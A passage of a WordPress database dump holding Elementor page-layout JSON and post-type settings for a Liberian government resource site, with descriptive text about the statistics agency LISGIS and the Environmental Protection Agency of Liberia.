More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"d6ea351\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"7f993f7\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"box_bg\":\"rgba(0,100,0,0.85)\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"#61ce70\",\"box_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_color_hover\":\"#014421\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(8226,710,'_elementor_edit_mode','builder'),(8227,710,'_elementor_template_type','wp-page'),(8228,710,'_elementor_version','2.7.5'),(8229,710,'_wp_page_template','default'),(8230,710,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db72bf2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50ccf42\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d4ac18b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"106c13c\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"page\",\"posts_query\":\"ids\",\"post_ids\":\"696,663,680,93,684,95,620,635,626,630,614,673,677,621,669,690,652,659\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"excerpt_length\":\"\",\"show_terms_tax\":\"resource_category\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"d6ea351\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"7f993f7\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"box_bg\":\"rgba(0,100,0,0.74)\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"#61ce70\",\"box_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_color_hover\":\"#014421\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(8233,711,'_elementor_edit_mode','builder'),(8234,711,'_elementor_template_type','wp-page'),(8235,711,'_elementor_version','2.7.5'),(8236,711,'_wp_page_template','default'),(8237,711,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db72bf2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50ccf42\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d4ac18b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"106c13c\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"page\",\"posts_query\":\"ids\",\"post_ids\":\"696,663,680,93,684,95,620,635,626,630,614,673,677,621,669,690,652,659\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"excerpt_length\":\"\",\"show_terms_tax\":\"resource_category\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"d6ea351\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"7f993f7\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"box_bg\":\"rgba(0,100,0,0.74)\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"#61ce70\",\"box_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_color_hover\":\"#014421\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(8247,713,'_elementor_edit_mode','builder'),(8248,713,'_elementor_template_type','wp-page'),(8249,713,'_elementor_version','2.7.5'),(8250,713,'_wp_page_template','default'),(8251,713,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db72bf2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50ccf42\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d4ac18b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"106c13c\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"page\",\"posts_query\":\"ids\",\"post_ids\":\"696,663,680,93,684,95,620,635,626,630,614,673,677,621,669,690,652,659\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"excerpt_length\":\"\",\"show_terms_tax\":\"resource_category\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"d6ea351\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"7f993f7\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"box_bg\":\"rgba(0,100,0,0.74)\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"#61ce70\",\"box_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_color_hover\":\"#014421\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f205ddb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8253,714,'_elementor_controls_usage','a:0:{}'),(8254,714,'label_singular','Institution'),(8255,714,'public','1'),(8256,714,'show_ui','1'),(8257,714,'supports_title','1'),(8258,714,'supports_editor','1'),(8259,714,'type','post_type'),(8260,714,'storage','meta'),(8261,714,'old_name','institution'),(8262,714,'publicly_queryable','1'),(8263,714,'exclude_from_search','0'),(8264,714,'capability_type','page'),(8265,714,'capability_type_custom','institution'),(8266,714,'capability_type_extra','1'),(8267,714,'has_archive','0'),(8268,714,'hierarchical','0'),(8269,714,'rewrite','1'),(8270,714,'rewrite_with_front','1'),(8271,714,'rewrite_feeds','0'),(8272,714,'rewrite_pages','1'),(8273,714,'query_var','1'),(8274,714,'can_export','1'),(8275,714,'default_status','draft'),(8276,714,'supports_author','0'),(8277,714,'supports_thumbnail','1'),(8278,714,'supports_excerpt','1'),(8279,714,'supports_trackbacks','0'),(8280,714,'supports_custom_fields','0'),(8281,714,'supports_comments','0'),(8282,714,'supports_revisions','0'),(8283,714,'supports_page_attributes','0'),(8284,714,'supports_post_formats','0'),(8285,714,'built_in_taxonomies_category','0'),(8286,714,'built_in_taxonomies_elementor_library_category','0'),(8287,714,'built_in_taxonomies_elementor_library_type','0'),(8288,714,'built_in_taxonomies_link_category','0'),(8290,714,'built_in_taxonomies_post_tag','0'),(8291,714,'built_in_taxonomies_resource_category','0'),(8292,714,'built_in_taxonomies_resource_tag','0'),(8293,714,'built_in_taxonomies_resource_type','0'),(8295,714,'show_in_menu','1'),(8296,714,'menu_position','0'),(8297,714,'menu_icon','dashicons-money'),(8298,714,'show_in_nav_menus','1'),(8299,714,'show_in_admin_bar','1'),(8300,714,'pfat_enable','0'),(8301,714,'pfat_run_outside_loop','0'),(8302,714,'pfat_single','Document Resources Template'),(8303,714,'pfat_append_single','append'),(8304,714,'pfat_filter_single','the_content'),(8305,714,'pfat_append_archive','append'),(8306,714,'pfat_filter_archive','custom'),(8307,714,'rest_enable','0'),(8308,714,'read_all','0'),(8309,714,'write_all','0'),(8310,412,'built_in_post_types_institution','0'),(8311,413,'built_in_post_types_institution','0'),(8317,412,'built_in_post_types_inst_resource','0'),(8318,413,'built_in_post_types_inst_resource','0'),(8319,465,'built_in_post_types_inst_resource','1'),(8381,1544,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8382,1544,'slide_template','default'),(8384,1544,'_elementor_template_type','wp-post'),(8385,1544,'_elementor_version','2.7.5'),(8386,1544,'_wp_page_template','default'),(8387,1544,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cc356dd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LISGIS Serves as the prime, authoritative agency of Government responsible for collecting, managing, coordinating, supervising, evaluating, analyzing, disseminating and setting quality standards for statistical and associated geo-information for overall national socio-economic reconstruction and development; and<\\/p><p>More specifically, LISGIS formulates and implements national strategies, programs and policies for the development and management of a National Statistical and Geo-Information System and an integrated gender and environment sensitive National Statistical and Spatial Database in Liberia.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8ebf546\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"1c7b3ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e89fbef\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b6f5d28\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"lisgis\\\",\\\"tag_id\\\":\\\"56\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"lisgis\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bef4576\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"762ba4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"89dda08\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"867bd0f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:lisgis\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8388,1544,'_dp_original','923'),(8389,1544,'_edit_last','42'),(8392,1582,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8393,1582,'slide_template','default'),(8395,1582,'_elementor_template_type','wp-post'),(8396,1582,'_elementor_version','2.7.5'),(8397,1582,'_wp_page_template','default'),(8398,1582,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.<\\/p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country\\u2019s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.<\\/p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.<\\/p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.<\\/p><h5>Mandate<\\/h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and 